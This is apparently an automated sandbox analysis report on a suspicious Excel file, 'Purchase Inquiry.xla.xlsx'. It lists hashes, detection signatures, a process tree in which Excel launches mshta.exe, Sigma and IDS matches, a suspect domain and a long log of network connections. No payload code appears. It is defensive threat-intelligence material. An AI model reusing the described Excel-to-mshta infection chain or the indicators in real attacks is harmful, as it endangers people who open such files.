Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Inquiry.xla.xlsx

Overview

General Information

Sample name:Purchase Inquiry.xla.xlsx
Analysis ID:1633348
MD5:c672b4eeec39f46454b43c1214ef293f
SHA1:2e706822d8e8f6250ff0d0dad46ce3886f71c08e
SHA256:081c752918d77ca90b7c46d538720c4a64b04593acd3d68f0ba9a5decbc99061
Tags:xlaxlsxuser-abuse_ch
Infos:

Detection

Score:56
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 7088 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 2136 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 336 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 5324 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Purchase Inquiry.xla.xlsx" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 7088, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 2136, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 3.39.153.44, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7088, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49700
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.7, DestinationIsIpv6: false, DestinationPort: 49700, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7088, Protocol: tcp, SourceIp: 3.39.153.44, SourceIsIpv6: false, SourcePort: 443
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-10T09:13:39.805073+010020283713Unknown Traffic192.168.2.74970413.107.253.72443TCP
2025-03-10T09:13:48.205241+010020283713Unknown Traffic192.168.2.74970613.107.253.72443TCP
2025-03-10T09:13:48.227540+010020283713Unknown Traffic192.168.2.74970713.107.253.72443TCP
2025-03-10T09:13:50.888269+010020283713Unknown Traffic192.168.2.74970913.107.253.72443TCP
2025-03-10T09:13:50.976760+010020283713Unknown Traffic192.168.2.74970813.107.253.72443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Purchase Inquiry.xla.xlsxVirustotal: Detection: 24%Perma Link
Source: Purchase Inquiry.xla.xlsxReversingLabs: Detection: 21%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 3.39.153.44:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.7:49708 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
Source: global trafficDNS query: name: link.saja.market
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49706 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49708 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 198.23.187.151:80
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49706 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49706 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49706 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49706 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49706 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49706 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49706 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49706 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49708 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49708 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49708 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49708 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49708 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49708 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49708 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49708 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49708 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49708 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 3.39.153.44:443
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 3.39.153.44:443
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 3.39.153.44:443
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 3.39.153.44:443
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 3.39.153.44:443
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 198.23.187.151:80
Source: global trafficTCP traffic: 198.23.187.151:80 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 198.23.187.151:80
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 198.23.187.151:80
Source: global trafficTCP traffic: 198.23.187.151:80 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 198.23.187.151:80 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 198.23.187.151:80 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 198.23.187.151:80 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 198.23.187.151:80 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 198.23.187.151:80
Source: global trafficTCP traffic: 198.23.187.151:80 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 198.23.187.151:80 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 198.23.187.151:80 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 198.23.187.151:80 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 198.23.187.151:80
Source: global trafficTCP traffic: 198.23.187.151:80 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 198.23.187.151:80 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 198.23.187.151:80
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 198.23.187.151:80
Source: global trafficTCP traffic: 198.23.187.151:80 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 198.23.187.151:80 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 198.23.187.151:80 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 198.23.187.151:80
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 198.23.187.151:80
Source: global trafficTCP traffic: 198.23.187.151:80 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 198.23.187.151:80
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 198.23.187.151:80
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 198.23.187.151:80
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
